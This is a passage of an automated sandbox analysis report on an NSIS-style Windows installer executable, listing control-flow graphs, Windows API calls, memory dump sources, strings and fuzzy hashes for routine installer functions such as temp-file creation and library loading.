4031be-4031c0 286->288 287->272 287->286 288->258
                              APIs
                              • GetTickCount.KERNEL32 ref: 00403093
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3Dut8dFCwD.exe,00000400), ref: 004030AF
                                • Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
                                • Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                              • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Dut8dFCwD.exe,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 004030FB
                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3Dut8dFCwD.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                              • API String ID: 2803837635-3269453103
                              • Opcode ID: 029ff5bc40cb25e8da3d427d571e525ea6566d1fbc352909608cbeb369897a4a
                              • Instruction ID: 635ab88c792e9e5f97a92d6c795dead4e0d31dcfeb410e4bc66b7a0500b41a5f
                              • Opcode Fuzzy Hash: 029ff5bc40cb25e8da3d427d571e525ea6566d1fbc352909608cbeb369897a4a
                              • Instruction Fuzzy Hash: DB51D371A01204AFDB109F65DD41BAE7EACEB49716F20817BF900B62D1CA7C9F408B5D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 353 401774-401799 call 402dab call 405e7a 358 4017a3-4017b5 call 406534 call 405e03 lstrcatW 353->358 359 40179b-4017a1 call 406534 353->359 364 4017ba-4017bb call 4067e2 358->364 359->364 368 4017c0-4017c4 364->368 369 4017c6-4017d0 call 406891 368->369 370 4017f7-4017fa 368->370 377 4017e2-4017f4 369->377 378 4017d2-4017e0 CompareFileTime 369->378 371 401802-40181e call 406024 370->371 372 4017fc-4017fd call 405fff 370->372 380 401820-401823 371->380 381 401892-4018bb call 4055b9 call 4032b9 371->381 372->371 377->370 378->377 382 401874-40187e call 4055b9 380->382 383 401825-401863 call 406534 * 2 call 406571 call 406534 call 405b94 380->383 393 4018c3-4018cf SetFileTime 381->393 394 4018bd-4018c1 381->394 395 401887-40188d 382->395 383->368 415 401869-40186a 383->415 397 4018d5-4018e0 FindCloseChangeNotification 393->397 394->393 394->397 398 402c38 395->398 401 4018e6-4018e9 397->401 402 402c2f-402c32 397->402 400 402c3a-402c3e 398->400 405 4018eb-4018fc call 406571 lstrcatW 401->405 406 4018fe-401901 call 406571 401->406 402->398 412 401906-4023a7 call 405b94 405->412 406->412 412->400 412->402 415->395 417 40186c-40186d 415->417 417->382
                              APIs
                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                              • CompareFileTime.KERNEL32(-00000014,?,10.0.19045.False,10.0.19045.False,00000000,00000000,10.0.19045.False,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp,?,?,00000031), ref: 004017DA
                                • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID: 10.0.19045.False$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp$C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dll
                              • API String ID: 1941528284-2711164482
                              • Opcode ID: 3ffec5e2436a6f5f0568e9a34f5becda87af7bfd853d8b16926dfd401e8784ff
                              • Instruction ID: f453ba81f7058b6188de9b36fe697e27c0e04e304a513fa9e8a23dac1ec640eb
                              • Opcode Fuzzy Hash: 3ffec5e2436a6f5f0568e9a34f5becda87af7bfd853d8b16926dfd401e8784ff
                              • Instruction Fuzzy Hash: C741C631800518BACF11BBB9DC85DBE3AB5EF41729B21423FF012B10E2DB3C8A51966D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 419 4032b9-4032d0 420 4032d2 419->420 421 4032d9-4032e2 419->421 420->421 422 4032e4 421->422 423 4032eb-4032f0 421->423 422->423 424 403300-40330d call 4034b1 423->424 425 4032f2-4032fb call 4034c7 423->425 429 403313-403317 424->429 430 40349f 424->430 425->424 431 40344a-40344c 429->431 432 40331d-403343 GetTickCount 429->432 433 4034a1-4034a2 430->433 434 40348c-40348f 431->434 435 40344e-403451 431->435 436 4034a7 432->436 437 403349-403351 432->437 438 4034aa-4034ae 433->438 439 403491 434->439 440 403494-40349d call 4034b1 434->440 435->436 441 403453 435->441 436->438 442 403353 437->442 443 403356-403364 call 4034b1 437->443 439->440 440->430 451 4034a4 440->451 445 403456-40345c 441->445 442->443 443->430 453 40336a-403373 443->453 448 403460-40346e call 4034b1 445->448 449 40345e 445->449 448->430 457 403470-40347c call 4060d6 448->457 449->448 451->436 454 403379-403399 call 406a83 453->454 461 403442-403444 454->461 462 40339f-4033b2 GetTickCount 454->462 463 403446-403448 457->463 464 40347e-403488 457->464 461->433 465 4033b4-4033bc 462->465 466 4033fd-4033ff 462->466 463->433 464->445 467 40348a 464->467 468 4033c4-4033fa MulDiv wsprintfW call 4055b9 465->468 469 4033be-4033c2 465->469 470 403401-403405 466->470 471 403436-40343a 466->471 467->436 468->466 469->466 469->468 474 403407-40340e call 4060d6 470->474 475 40341c-403427 470->475 471->437 472 403440 471->472 472->436 480 403413-403415 474->480 476 40342a-40342e 475->476 476->454 479 403434 476->479 479->436 480->463 481 403417-40341a 480->481 481->476
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CountTick$wsprintf
                              • String ID: ... %d%%
                              • API String ID: 551687249-2449383134
                              • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                              • Instruction ID: 8b929f0044e1ac0cacba81bf46ea48fcc998b80fd55e06c59bd949555b0c30d1
                              • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                              • Instruction Fuzzy Hash: E5515F71900219DBCF11CF95D98469F7FA8AF4076AF14417BE804BB2C0C77C9A50CBAA

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 482 4068b8-4068d8 GetSystemDirectoryW 483 4068da 482->483 484 4068dc-4068de 482->484 483->484 485 4068e0-4068e9 484->485 486 4068ef-4068f1 484->486 485->486 487 4068eb-4068ed 485->487 488 4068f2-406925 wsprintfW LoadLibraryExW 486->488 487->488
                              APIs
                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                              • wsprintfW.USER32 ref: 0040690A
                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: DirectoryLibraryLoadSystemwsprintf
                              • String ID: %s%S.dll$UXTHEME
                              • API String ID: 2200240437-1106614640
                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                              • Instruction ID: 81ed32cd441a27d4f3f8ebc13d3c3c121413d11d2ad97d4a1e4b49bf3134d0f2
                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                              • Instruction Fuzzy Hash: 64F0FC31501219AACB10BB64DD0DF9B375C9B00305F10847AA646F10D0EB78D668C798

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 489 405f0b-405f26 call 406534 call 405eae 494 405f28-405f2a 489->494 495 405f2c-405f39 call 4067e2 489->495 496 405f84-405f86 494->496 499 405f49-405f4d 495->499 500 405f3b-405f41 495->500 502 405f63-405f6c lstrlenW 499->502 500->494 501 405f43-405f47 500->501 501->494 501->499 503 405f6e-405f82 call 405e03 GetFileAttributesW 502->503 504 405f4f-405f56 call 406891 502->504 503->496 509 405f58-405f5b 504->509 510 405f5d-405f5e call 405e4f 504->510 509->494 509->510 510->502
                              APIs
                                • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                              • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F64
                              • GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405F74
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                              • API String ID: 3248276644-4211009014
                              • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                              • Instruction ID: 4254dd577ef462a113b6af6603d7003c895b553eaebd6861c82524aaccd31353
                              • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                              • Instruction Fuzzy Hash: 12F02835105E5329D622333A6C05AAF1544CFC6368719067BF892B22D5CF3C8B438CBE

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 512 406053-40605f 513 406060-406094 GetTickCount GetTempFileNameW 512->513 514 4060a3-4060a5 513->514 515 406096-406098 513->515 517 40609d-4060a0 514->517 515->513 516 40609a 515->516 516->517
                              APIs
                              • GetTickCount.KERNEL32 ref: 00406071
                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040350D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9), ref: 0040608C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                              • API String ID: 1716503409-44229769
                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                              • Instruction ID: c38105da250e7271fccf8508e97940083eab768234b1f6861d150eb6f31dd2f1
                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                              • Instruction Fuzzy Hash: 27F09076B40204BBEB00CF69ED05F9EB7ACEB95750F11803AFA01F7180E6B0A9548768

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 518 4015c6-4015da call 402dab call 405eae 523 401636-401639 518->523 524 4015dc-4015ef call 405e30 518->524 526 401668-4022fb call 401423 523->526 527 40163b-40165a call 401423 call 406534 SetCurrentDirectoryW 523->527 531 4015f1-4015f4 524->531 532 401609-40160c call 405ae2 524->532 542 402c2f-402c3e 526->542 527->542 545 401660-401663 527->545 531->532 535 4015f6-4015fd call 405aff 531->535 541 401611-401613 532->541 535->532 549 4015ff-401602 call 405a88 535->549 546 401615-40161a 541->546 547 40162c-401634 541->547 545->542 550 401629 546->550 551 40161c-401627 GetFileAttributesW 546->551 547->523 547->524 553 401607 549->553 550->547 551->547 551->550 553->541
                              APIs
                                • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,75923420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                • Part of subcall function 00405A88: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nsm4D39.tmp,?,00000000,000000F0), ref: 00401652
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 00401645
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                              • String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp
                              • API String ID: 1892508949-1064468493
                              • Opcode ID: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                              • Instruction ID: 625a4e517e3d2ef51acfe74bc6df62a7a1d29dad7f850d028ad858b28003b980
                              • Opcode Fuzzy Hash: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                              • Instruction Fuzzy Hash: 3611D031504114ABCF206FA5CD405AF36A0EF04368B29493FE945B22F1DA3D4A819B4E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 554 4020dd-4020e9 555 4021a8-4021aa 554->555 556 4020ef-402105 call 402dab * 2 554->556 557 4022f6-4022fb call 401423 555->557 566 402115-402124 LoadLibraryExW 556->566 567 402107-402113 GetModuleHandleW 556->567 564 402c2f-402c3e 557->564 569 402126-402135 call 406997 566->569 570 4021a1-4021a3 566->570 567->566 567->569 573 402170-402175 call 4055b9 569->573 574 402137-40213d 569->574 570->557 579 40217a-40217d 573->579 575 402156-40216e 574->575 576 40213f-40214b call 401423 574->576 575->579 576->579 587 40214d-402154 576->587 579->564 582 402183-40218d call 403ba6 579->582 582->564 586 402193-40219c FreeLibrary 582->586 586->564 587->579
                              APIs
                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,00798F00,759223A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402119
                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402196
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                              • String ID:
                              • API String ID: 334405425-0
                              • Opcode ID: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
                              • Instruction ID: 536d658b2d5626a072540831630168b43a4966d71debd26089b563c1caab560b
                              • Opcode Fuzzy Hash: ccfc87da9fdcbdf16f26fe9f90524ed476b134ac267b0d15e4dc6efb72c1dd6b
                              • Instruction Fuzzy Hash: 4321B031904108EADF11AFA4CE49A9D7A71BF84358F20423FF201B91E1CBBD8982961E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 588 401ba0-401bab 589 401bf1-401bf4 588->589 590 401bad-401bb0 588->590 591 401bf6-401bf8 589->591 592 401c1b-401c31 GlobalAlloc call 406571 589->592 593 401bb6-401bba 590->593 594 40238f-4023a7 call 406571 call 405b94 590->594 596 402933-40293a 591->596 597 401bfe-401c16 call 406534 GlobalFree 591->597 603 401c36-401c43 592->603 593->590 599 401bbc-401bbe 593->599 600 402c2f-402c38 594->600 610 402c3a-402c3e 594->610 596->600 597->600 599->594 604 401bc4-402a9e call 406534 * 3 599->604 600->610 603->594 603->600 604->600
                              APIs
                              • GlobalFree.KERNEL32(00AE25E0), ref: 00401C10
                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd
                              Similarity
                              • API ID: Global$AllocFree
                              • String ID: 10.0.19045.False
                              • API String ID: 3394109436-2006975710
                              • Opcode ID: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                              • Instruction ID: ebda21c3d1e0d5701a49ae815e8da7541a6b67fff49d9363c78ae17fdfc2c87a
                              • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                              • Instruction Fuzzy Hash: 0D21C973904114EBDB20EBA8EE85A5E72F4AB04324755053FF542B72D0C67CD8418F5D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 618 405bf8-405c09 call 405fff 621 405c39 618->621 622 405c0b-405c11 618->622 623 405c3b-405c3d 621->623 624 405c13-405c19 RemoveDirectoryW 622->624 625 405c1b DeleteFileW 622->625 626 405c21-405c23 624->626 625->626 627 405c25-405c28 626->627 628 405c2a-405c2f 626->628 627->623 628->621 629 405c31-405c33 SetFileAttributesW 628->629 629->621
                              APIs
